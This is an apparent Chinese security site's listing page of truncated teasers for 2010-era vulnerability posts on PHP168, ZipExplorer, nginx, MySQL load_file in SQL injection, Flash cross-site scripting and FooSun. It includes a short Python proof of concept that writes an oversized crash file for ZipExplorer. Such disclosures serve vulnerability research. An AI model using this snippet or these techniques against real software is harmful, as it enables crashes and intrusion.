网络安全

网络安全是保护硬件、软件及其系统中的数据不被恶意破坏、更改、泄露。

PHP168 V6.01 权限提升漏洞

发布时间:2010-06-17 影响版本:PHP168 V6.01 漏洞描述: PHP168整站是PHP领域当前功能最强大的建站系统,代码全部开源,可极其方便的进行二次开发,所有功能...

ZipExplorer 7.0 利用工具

作者:TecR0c #!/usr/bin/python dos = "\x41" * 2000 mefile = open('tecr0c.zar','w'); mefile.write(dos); mefile.close(); 利用方法:启动ZipExplor...

nginx HTTP请求源码泄露和拒绝服务漏洞

发布时间:2010-06-14 影响版本: nginx 0.7.x/0.8.x 漏洞描述: nginx是多平台的HTTP服务器和邮件代理服务器 nginx服务器无法处理交换数据流(ADS),将其处理...

SQL注射中使用Mysql load_file解析bsd目录的脚本

作者:xi4oyu 可能不少x客都知道mysql load_file能够读取文件的内容。但是在bsd平台上,load_file也能够以文件的方式读取目录内容的前512个字节。 以前遇到这...

一段扫flash跨站的脚本

作者:xy7 没啥技术含量,主要是扫ExternalInterface.call #!/usr/bin/php -q <?php /*--------------------------------xy7@80sec.com--------------...

风讯网站管理系统API_Response.asp页面存在越权漏洞

来源:WEB应用漏洞库 影响版本: FooSun > 5.0 漏洞分析: 在文件\API\API_Response.asp中: If Request.QueryString<>"" Then //第16行 SaveUserCoo...